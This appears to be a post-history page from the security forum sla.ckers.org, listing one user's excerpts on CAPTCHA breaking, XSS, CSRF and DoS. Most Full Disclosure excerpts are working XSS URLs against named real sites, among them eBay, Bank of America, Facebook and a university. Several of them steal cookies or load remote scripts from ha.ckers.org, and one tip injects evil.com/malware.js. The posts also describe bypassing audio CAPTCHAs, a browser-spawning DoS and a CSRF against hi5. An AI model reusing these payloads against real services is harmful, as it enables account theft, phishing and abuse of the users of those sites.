sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Ways to stop spam, detect robotic activity, and actually harm the spam trade, as well as how it works, how to circumvent filters, etc. 

Current Page: 1 of 26
Results 1 - 30 of 756
5 years ago
maluc
Finally got around to fixing. Simply requires the old password.. as I am too lazy to build in a nonce framework. -maluc
Forum: Bugs
5 years ago
maluc
Finally got around to fixing. The salted hash is different per person but static across your sessions. -maluc
Forum: Bugs
6 years ago
maluc
In its current state, i'm pretty confident i can write a captcha solver for it, at least on low. (high looks like a nightmare, lol) when you get any kinks out of it to a point i can take a fair swing at it - let me know .. i'd love to try ^^ For those testing Codetcha, i should point out that it's seemingly developed using firefox.. you'll get some buggy behavior in IE7, so use FF. -maluc
Forum: Robots/Spiders/CAPTCHAs, oh my
6 years ago
maluc
I like the idea, although it does have the side effect of limiting your audience to those capable of answering it - a bit elitist and un-beginner-friendly. (but that may be what that site wants) The only tricky part i see, is making a question base that's big enough and unique enough so an attacker can't just archive all permutations. Another huge boost to complexity would be to make the cod
Forum: Robots/Spiders/CAPTCHAs, oh my
6 years ago
maluc
Heh, I agree 99+% is more hopeful than realistic.. but anything above 50% is really pretty brutal, so i'd be satisfied with that. Breaking audio captchas seems to be a pretty overlooked vector in captcha solving - likely because no one seems to wanna learn audio signal processing anymore :T .. My sound parsing experience had been limited to DTMF (touch-tone sounds), so it's somewhat new for me
Forum: Robots/Spiders/CAPTCHAs, oh my
6 years ago
maluc
Well I started using them to train a neural network on an audio CAPTCHA (not one listed above), but I haven't had the time to get it fully working. The audio CAPTCHA i picked to start with has very little noise and amplitude adjustments, so the NN should identify it easily. The tricky part is in segmenting wave files when they have varying speed and the letters are not evenly paced. :T Once I g
Forum: Robots/Spiders/CAPTCHAs, oh my
6 years ago
maluc
And for those interested, these were my initial notes on the properties of each CAPTCHA. Might save someone a bit of time. Spammy: CAPTCHA notes gmail: link to view: https://www.google.com/accounts/NewAccount?service=mail&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fe-11-10ba05aeaa8e9b701e5151437f9a44d3-64aeae753cc34f1c864f7edc97a046ccdc96987b&type=2 length: 5-8 range: a-z c
Forum: Robots/Spiders/CAPTCHAs, oh my
6 years ago
maluc
When it comes time to test and tweak an algorithm, or just to figure out where it's best to begin, it's helpful to have a large sample size to work with. Below are several php scripts I used to extract out and save 1000 CAPTCHA jpegs or wavs from the major email sites. They work very similarly, but each one has subtle changes in parsing. The URL at the top of each file may need updating when you
Forum: Robots/Spiders/CAPTCHAs, oh my
6 years ago
maluc
The topic title is descriptive enough.. http://www.hi5.com/friend/account/editAccountLocale.do?defaultLanguage=th changes their language to Thai if they're logged in. http://www.hi5.com/friend/account/editAccountLocale.do?defaultLanguage=en back to english -maluc
Forum: CSRF and Session Info
6 years ago
maluc
hiya Ronald, research wasn't paying the bills.. so i had to limit it a lot for a while :T it's good to be back though, missed this place. i'll try to keep contributing ^^ Must be logged in: http://www.crunchyroll.com/inbox?q=asdf%3Cbody%20onload%3D%22alert('XSS')%22%3Eqwer -maluc
Forum: Full Disclosure
6 years ago
maluc
http://pages.ebay.com/help/tp/items-authentication.html?fromFeature=%3Cbody%20onload%3Deval(%22ale%22%2B%22rt(docu%22%2B%22ment.cookie)%22)%3E I believe ebay employs a blacklist on keywords like 'document.cookie' and 'script' and 'alert(' -maluc
Forum: Full Disclosure
6 years ago
maluc
I don't know that this has also been live a full year while undisclosed - but at least 7 months. https://epreferences.bankofamerica.com/asbs/servlet/SS?F=1410408&X=40058617572&T=40058617572&Z=asdf%22%3E%3Czz%20name%3D'zz'%20id%3D'0'%3E%3C/zz%3E%3Cscript%3Ex%3Ddocument.getElementsByName%28%27zz%27%29%5B0%5D;if(x.id%3D%3D0)%7Balert%28%271%20Phish%27%29;x.id%3D1;%7Delse%20if(x.id%3D%3D1
Forum: Full Disclosure
6 years ago
maluc
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://secure.facebook.com/add_poll.php&price_per_response=50&max_responses=200&cc_name=john+smith&cc_cardType=86&cc_creditCardNumber=4123412312341234&cc_expMonth=1&cc_expYear=2009&cc_countryCode=US&cc_street=qwer%22%3E%3Cscript%20src%3D%22http://ha.ckers.org/s.js%22%3E%3C/script%20vvvvv%3Ee&cc
Forum: Full Disclosure
6 years ago
maluc
http://www.bankofamerica.com/state.cgi?section=contact&update=yes&cookiecheck=yes&lob=asdf%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%22%20k This has been live and undisclosed for at least over a year that i've had it saved.. still works ^^ I no longer have a BoA account to use it further, however. -maluc
Forum: Full Disclosure
6 years ago
maluc
http://dev.mysql.com/get/anyQueryString/from/http://asdf.com/ anyQueryString is modifiable, as is asdf.com/ -maluc
Forum: Full Disclosure
6 years ago
maluc
a fun exercise in why partial censoring can be dangerous.. spacing comparison can likely uncover more, but i haven't the patience for that ^^ New Image: -maluc
Forum: Full Disclosure
6 years ago
maluc
my uni https://cs7000a.uta.edu/logon?--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C!--a -maluc
Forum: Full Disclosure
6 years ago
maluc
This site is well guarded against XSS in every form and parameter.. but they didn't make sure to filter arbitrary parameter names http://my.convio.com/?elqPURLPage=7&notaparameter=--%3E%3C/script%20v=b%3E%3Cscript%20src=%22http://ha.ckers.org/s%22%3E -maluc
Forum: Full Disclosure
6 years ago
maluc
very much the same as mailto tags.. but less cpu intensive. It only peaks my cpu around 50% so it's still plenty useable, and ending the iexplore process will stop the spawning. Each instance uses 3-4mb of memory on my system. The only more annoying thing over mailto: tags is that windows won't group these in the taskbar - so it's a pain to close them all afterwards. <html> <head>
Forum: DoS
7 years ago
maluc
These are ones i had saved a while back (ironically enough, in my yahoo email account), for obvious reasons .. gaining access to a victim's email account is generally more useful than any one website they frequent. Anyway, with the ease to find yahoo XSS holes and the fact that i have no time for my webappsec research - i'll just disclose em: Disclaimer- i have a couple thousand unread slackers po
Forum: Full Disclosure
7 years ago
maluc
lol.. well it'd take a while for the trial and all.. so u'd know if i got locked ups _-_ (unless all those unpaid speeding tickets now in warrant status finally catch up to me) anyway, i'm leaving for DC in about 8 hours.. and will be in virginia for a week. so i guess i wont catch up over spring break as i thought i would .-. anyone in either of those two states (DC = maryland far as im con
Forum: Intro
7 years ago
maluc
thought i'd reintroduce myself if anyone forgot who i was by now (and to the many new faces) i'm maluc, and i'll be a lurker for a while longer .. perhaps until as long as may :T webappsec is still my passion, but life has a habit of getting in the way .-. i'm still tinkering behind the scenes a bit, one day i'll have the time to write it all up - although i'm happy to see a couple of the t
Forum: Intro
7 years ago
maluc
that's because it's modifying the document before it's fully loaded.. use <script defer> instead. <script defer>e=document.createElement('div');e.setAttribute('id','test');document.body.appendChild(e);</script> defer prevents the javascript from executing until the page has fully loaded. Alternatively, you can set a body onload event to trigger the rest of your code. It's e
Forum: XSS Info
7 years ago
maluc
lol at 2600.. although it probably doesn't have much practical use, it's still amusing to see. -maluc
Forum: Full Disclosure
7 years ago
maluc
i'd suggest coding it in both IE and firefox one line at a time then - and checking functionality. trying to get it working fully in one first then porting, will give you white hairs .. there's just too many nuances to keep track of. There's really not too many differences in their javascript engines though .. aside from defining XHR objects, the way they handle 'defer' and extra functions/attri
Forum: Full Disclosure
7 years ago
maluc
well the only blogspot i go to, http://jeremiahgrossman.blogspot.com isn't affected .. so i wonder if it's a bug in the particular theme kuza uses? either way, it's a nice find. i don't have a blog there so i can't check whether it's able to access its authentication cookies or not. anyway, very good find. -maluc
Forum: Full Disclosure
7 years ago
maluc
The Anti-Privacy addition.. that makes all private myspaces as public viewable. perhaps also needing to change the ages of people under 14 to 99 due to the online predator protections. (Or alternatively, making all public profiles private) If they stay public for a couple days, google will cache them and that snapshot will be viewable indefinitely i believe - or at least much longer. Addition
Forum: Full Disclosure
7 years ago
maluc
perhaps wormtra.ckers.org .-. assuming it were hosted here -maluc
Forum: Projects
7 years ago
maluc
spam is evil.. and not the sexy Dr. Evil kind of evil.. the bad google kind -_- -maluc
Forum: Projects
7 years ago
maluc
try tab %09 or carriage return %0D or line feed %0A .. in place of the spaces if that doesn't work you can try just not using any spaces.. like: <script>x=document.createElement('script');x.src="evil.com/malware.js";document.body.appendChild(x)</script> -maluc
Forum: XSS Info